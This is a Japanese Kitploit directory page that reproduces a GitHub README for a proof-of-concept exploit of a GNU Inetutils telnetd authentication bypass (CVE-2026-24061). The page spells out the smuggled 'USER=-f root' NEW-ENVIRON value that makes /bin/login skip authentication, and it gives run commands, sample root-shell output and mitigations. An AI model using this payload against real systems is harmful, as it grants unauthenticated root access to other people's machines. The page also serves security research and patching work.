Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-24061-GNU-Inetutils-telnetd-Remote-Authentication-Bypass-Root-Shell- — GNU Inetutils telnetd 認証バイパス(CVE-2026-24061)の概念実証エクスプロイト。細工した NEW-ENVIRON USER 変数を介して root シェルを起動します。 | Kitploit
ツール/GitHubGitHub/mbanyamer/cve-2026-24061-gnu-inetutils-telnetd-remote-authentication-bypass-root-shell-
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト認証リモートアクセスツール
GitHubmbanyamer/cve-2026-24061-gnu-inetutils-telnetd-remote-authentication-bypass-root-shell-

CVE-2026-24061-GNU-Inetutils-telnetd-Remote-Authentication-Bypass-Root-Shell-

GNU Inetutils telnetd 認証バイパス(CVE-2026-24061)の概念実証エクスプロイト。細工した NEW-ENVIRON USER 変数を介して root シェルを起動します。

リポジトリを見る
6ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Author Role Country Platform Vulnerability CVE CVSS Status


🧨 概要

このリポジトリには、GNU Inetutils telnetd のリモート認証バイパス脆弱性に対する Proof‑of‑Concept エクスプロイトが含まれています。

この問題は、telnetd が /bin/login を呼び出す前に、Telnet NEW‑ENVIRON ネゴシエーションを介して受信した USER 環境変数を適切にサニタイズしないために発生します。

以下を送信することで:

root@kitploit:~
USER=-f root

telnetd は実質的に以下を実行します:

root@kitploit:~
/bin/login -f root

これにより認証がバイパスされ、即座に root シェル が起動します。

  • 製品: GNU Inetutils telnetd
  • 影響を受けるバージョン: ≤ 2.7
  • ポート: 23/TCP
  • 認証: 不要
  • 影響: 認証バイパス → Root シェル
  • 権限: root
  • CVE: CVE‑2026‑24061
  • CVSS: 9.8 (Critical)

⚙️ 技術的詳細

Telnet NEW‑ENVIRON により、クライアントはセッションネゴシエーション中に環境変数を設定できます。

脆弱な telnetd は USER を login に直接渡します:

root@kitploit:~
/bin/login -f "$USER"

攻撃者は以下を設定します:

root@kitploit:~
USER=-f root

結果:

root@kitploit:~
/bin/login -f root

-f フラグは login に 認証をスキップ するよう指示し、root アクセスを許可します。


📦 要件

  • Python 3
  • telnetlib (標準ライブラリ)
  • 脆弱な inetutils‑telnetd ≤ 2.7 が動作しているターゲット
  • TCP/23 で到達可能な Telnet サービス

外部依存関係は不要です。


🚀 使用方法

1️⃣ エクスプロイトの実行

root@kitploit:~
python3 cve-2026-24061.py 192.168.1.100

2️⃣ ポートの指定 (任意)

root@kitploit:~
python3 cve-2026-24061.py example.com 23

3️⃣ 期待される結果

脆弱な場合:

root@kitploit:~
# id
uid=0(root) gid=0(root)
#

対話型の root シェルが取得できます。


🧪 例

root@kitploit:~
python3 cve-2026-24061.py 10.10.10.20

出力:

root@kitploit:~
[+] Connected to 10.10.10.20:23
[+] Sent malicious USER=-f root via NEW-ENVIRON
[+] Negotiation complete - entering interactive shell
#

🧯 注意事項

  • エクスプロイトは 即時 に動作します
  • ブルートフォースは不要です
  • 認証情報は不要です
  • 実環境での悪用が確認されています
  • デフォルトの Debian/Ubuntu inetutils‑telnetd インストールで動作します
  • telnetd がパッチ適用済みまたは置き換えられている場合 (例: OpenBSD telnetd) は失敗します

🛡️ 緩和策

  • GNU Inetutils ≥ 2.8 にアップグレード
  • telnet サービスを無効化
  • SSH に置き換え
  • ファイアウォールで TCP/23 をブロック
  • inetutils‑telnetd パッケージを監査

📊 PoC 攻撃フロー

root@kitploit:~
sequenceDiagram
    participant A as Attacker
    participant T as Target telnetd
    participant L as /bin/login
    participant R as Root Shell

    A->>T: Connect TCP/23
    A->>T: Telnet NEW-ENVIRON USER=-f root
    T->>L: Execute /bin/login -f root
    L-->>T: Auth bypass success
    T-->>R: Spawn root shell
    R-->>A: Interactive root session

⚠️ 免責事項

このエクスプロイトは以下を目的として提供されています:

  • セキュリティ研究
  • 許可されたペネトレーションテスト
  • 防御的検証

所有していない、またはテスト許可を得ていないシステムに対する不正使用は違法です。

ツールをダウンロード